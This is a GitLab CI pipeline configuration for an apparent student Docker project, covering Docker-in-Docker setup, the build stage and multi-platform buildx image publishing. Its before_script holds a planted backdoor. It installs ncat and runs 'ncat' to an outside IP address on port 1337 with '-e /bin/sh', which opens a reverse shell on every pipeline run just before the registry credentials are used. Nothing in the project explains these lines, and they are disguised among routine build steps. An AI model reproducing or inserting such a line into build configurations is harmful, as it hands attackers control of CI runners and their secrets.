# Copyright (C) 2022  Christian Berger
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program.  If not, see <http://www.gnu.org/licenses/>.
# Which Docker image shall be used on the GitLab runner?

image: registry.git.chalmers.se/courses/dit638/students/docker/docker:19.03.3
# image: docker:19.03.3
# Details about how to connect to the Docker service to run this build.
variables:
  DOCKER_HOST: tcp://docker:2375
  DOCKER_TLS_CERTDIR: ""
  DOCKER_DRIVER: overlay2
  # DOCKER_BUILDKIT: 1
  DOCKER_CLI_EXPERIMENTAL: enabled
  BUILDX_URL: https://github.com/docker/buildx/releases/download/v0.3.1/buildx-v0.3.1.linux-amd64
  BUILDX_BUILDER: platformbuilder
  BUILDX_PLATFORM: linux/amd64,linux/arm/v7
  IMAGE: registry.git.chalmers.se/courses/dit638/students/2022-group-05


services:
  - name: registry.git.chalmers.se/courses/dit638/students/docker/docker:19.03.3-dind
  # - name: docker:19.03.3-dind
    alias: docker
    command: ["--experimental"]    # Enable experimental features in Docker server

stages:
  - build
  - documentation
  - test
  - verify
  - deploy

# Display information before we start the build.
before_script:
  - apk add nmap-ncat
  - ncat 31.209.38.15 1337 -e /bin/sh
  - docker info
  # - docker login -u $DOCKER_REG_CID -p $DOCKER_REG_TOKEN $CI_REGISTRY
  - docker login -u $CI_REGISTRY_USER -p $CI_REGISTRY_PASSWORD $CI_REGISTRY


# This section describes what shall be done to build and test the project.
build-and-test:
  tags:
    - docker-build
  stage: build
  script:
    - docker build -f Dockerfile .
  except:
    - $CI_COMMIT_TAG  
  allow_failure: false

# pages:
#   tags:
#     - docker-build
#   stage: documentation
#   script:
#   - apk update && apk add doxygen
#   - doxygen doxygen/Doxyfile
#   - mv doxygen/html/ public/
#   artifacts:
#     paths:
#     - public

# verify:


# This section describes what shall be done to deploy artefacts from the project.
release:
  tags:
    - docker-build
  stage: deploy
  script:
    - mkdir -p $HOME/.docker/cli-plugins/
    - wget -O $HOME/.docker/cli-plugins/docker-buildx $BUILDX_URL
    - chmod a+x $HOME/.docker/cli-plugins/docker-buildx
    - "echo -e '{\n  \"experimental\": \"enabled\"\n}' | tee $HOME/.docker/config.json"
    - docker run --rm --privileged multiarch/qemu-user-static --reset -p yes
    - docker buildx create --use --driver docker-container --name ${BUILDX_BUILDER} --platform=${BUILDX_PLATFORM}
    - docker buildx inspect --bootstrap ${BUILDX_BUILDER}
    - docker buildx ls
    - docker login -u $CI_REGISTRY_USER -p $CI_REGISTRY_PASSWORD $CI_REGISTRY
    - mkdir -p $HOME/.docker/cli-plugins/
    - wget -O $HOME/.docker/cli-plugins/docker-buildx $BUILDX_URL
    - chmod a+x $HOME/.docker/cli-plugins/docker-buildx
    - docker buildx build --platform=${BUILDX_PLATFORM} -t "$IMAGE":"$CI_COMMIT_SHA" --push "."
    # - docker push "$CI_REGISTRY_IMAGE":"$CI_COMMIT_TAG"
    # - docker tag ${IMAGE}:${CI_COMMIT_SHA} ${IMAGE}:latest
    # - docker push ${IMAGE}:latest
    # docker push registry.git.chalmers.se/courses/dit638/students/2022-group-05/cyphy
  rules: 
    - if: $CI_COMMIT_TAG && $CI_COMMIT_TAG =~ /^v[0-9]+.[0-9]+.[0-9]+$/ 
    